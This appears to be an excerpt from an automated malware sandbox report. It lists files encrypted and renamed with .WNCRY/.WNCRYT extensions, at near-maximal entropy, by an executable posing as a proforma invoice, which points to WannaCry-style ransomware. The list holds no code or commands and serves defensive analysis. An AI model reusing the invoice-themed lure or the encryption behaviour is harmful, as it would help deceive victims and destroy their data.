            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.9940420487Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.99963243635Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99940380078Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.99731989835Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\microsoft-365-logo-01d5ecd01a[1].png.WNCRYT entropy: 7.99186739012Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRYT entropy: 7.99525127513Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRYT entropy: 7.99793675084Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRYT entropy: 7.99279688532Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRYT entropy: 7.99519416221Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRYT entropy: 7.99972298792Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\otel-logger-104bffe9378b8041455c[1].js.WNCRYT entropy: 7.9982805142Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-bundle-3a99f64809c6780df035[1].js.WNCRYT entropy: 7.99984900179Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRYT entropy: 7.99592796159Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRYT entropy: 7.99666016174Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRYT entropy: 7.99926263175Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99989075045Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst entropy: 7.99925170269Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99988710524Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js.WNCRYT entropy: 7.99807321117Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRYT entropy: 7.99533292633Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.WNCRYT entropy: 7.99948246376Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5fBhIWX2NfxoiM-aOLeKJczoLSY.br[1].js.WNCRYT entropy: 7.99917311495Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js.WNCRYT entropy: 7.99862496154Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRYT entropy: 7.99860709509Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRYT entropy: 7.99875831532Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\dMxp0YQLz5hOQviuFXI5GuahQMU.br[1].js.WNCRYT entropy: 7.99890340777Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js.WNCRYT entropy: 7.9990600479Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRYT entropy: 7.99754053194Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT entropy: 7.99035057799Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRYT entropy: 7.99419777368Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRYT entropy: 7.99108007411Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99783772905Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\hero-image-desktop-f6720a4145[1].jpg.WNCRYT entropy: 7.9986520145Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8ee78fd-d176-4c8f-8cec-9b871e482fc9}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99473697835Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRYT entropy: 7.99983906533Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cc7c19be-c875-45a8-a842-280a49a1fc7b}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99521249558Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRYT entropy: 7.99981989883Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fd3d9edb-5afa-4408-b975-b935bb94595a}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99436800603Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRYT entropy: 7.99980488019Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsconversions.txt.WNCRYT entropy: 7.99987746116Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRYT entropy: 7.99988569371Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsglobals.txt.WNCRYT entropy: 7.99949080458Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appssynonyms.txt.WNCRYT entropy: 7.99907713882Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsconversions.txt.WNCRYT entropy: 7.99968683567Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsglobals.txt.WNCRYT entropy: 7.99580098764Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingssynonyms.txt.WNCRYT entropy: 7.99847294664Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99919552899Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.999175669Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568410610122.txt.WNCRYT entropy: 7.99841422706Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568649888396.txt.WNCRYT entropy: 7.99845479586Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568689900585.txt.WNCRYT entropy: 7.99825509888Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568968645838.txt.WNCRYT entropy: 7.99810311795Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569273535777.txt.WNCRYT entropy: 7.9983137977Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569507933106.txt.WNCRYT entropy: 7.99807045875Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569637876063.txt.WNCRYT entropy: 7.99834110982Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569861128322.txt.WNCRYT entropy: 7.99822778934Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410576842135818.txt.WNCRYT entropy: 7.99867534212Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577537420123.txt.WNCRYT entropy: 7.99853360857Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577989149207.txt.WNCRYT entropy: 7.99843458186Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410578287710703.txt.WNCRYT entropy: 7.99817486924Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410578912835438.txt.WNCRYT entropy: 7.9984346693Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410582733672226.txt.WNCRYT entropy: 7.99824200268Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.WNCRYT entropy: 7.99995377702Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.zip.WNCRYT entropy: 7.99994913974Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.zip entropy: 7.99937050114Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.WNCRY (copy) entropy: 7.99995377702Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\Request for Quotation (RFQ_196).zip.zip.WNCRY (copy) entropy: 7.99994913974Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRY (copy) entropy: 7.99926263175Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRY (copy) entropy: 7.99754053194Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\hero-image-desktop-f6720a4145[1].jpg.WNCRY (copy) entropy: 7.9986520145Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c8ee78fd-d176-4c8f-8cec-9b871e482fc9}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99473697835Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{cc7c19be-c875-45a8-a842-280a49a1fc7b}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99521249558Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{fd3d9edb-5afa-4408-b975-b935bb94595a}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99436800603Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsconversions.txt.WNCRY (copy) entropy: 7.99987746116Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appsglobals.txt.WNCRY (copy) entropy: 7.99949080458Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\appssynonyms.txt.WNCRY (copy) entropy: 7.99907713882Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsconversions.txt.WNCRY (copy) entropy: 7.99968683567Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingsglobals.txt.WNCRY (copy) entropy: 7.99580098764Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d06c509d-8a30-4327-922a-2afb1630c2aa}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99847294664Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{615928dd-022f-4339-b734-9a8a7fd59f58}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99919552899Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{af177fd8-4436-44f8-b660-59b1d73126a6}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.999175669Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568410610122.txt.WNCRY (copy) entropy: 7.99841422706Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568649888396.txt.WNCRY (copy) entropy: 7.99845479586Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568689900585.txt.WNCRY (copy) entropy: 7.99825509888Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410568968645838.txt.WNCRY (copy) entropy: 7.99810311795Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569273535777.txt.WNCRY (copy) entropy: 7.9983137977Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569507933106.txt.WNCRY (copy) entropy: 7.99807045875Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569637876063.txt.WNCRY (copy) entropy: 7.99834110982Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569861128322.txt.WNCRY (copy) entropy: 7.99822778934Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410576842135818.txt.WNCRY (copy) entropy: 7.99867534212Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577537420123.txt.WNCRY (copy) entropy: 7.99853360857Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577989149207.txt.WNCRY (copy) entropy: 7.99843458186Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410578287710703.txt.WNCRY (copy) entropy: 7.99817486924Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410578912835438.txt.WNCRY (copy) entropy: 7.9984346693Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410582733672226.txt.WNCRY (copy) entropy: 7.99824200268Jump to dropped file
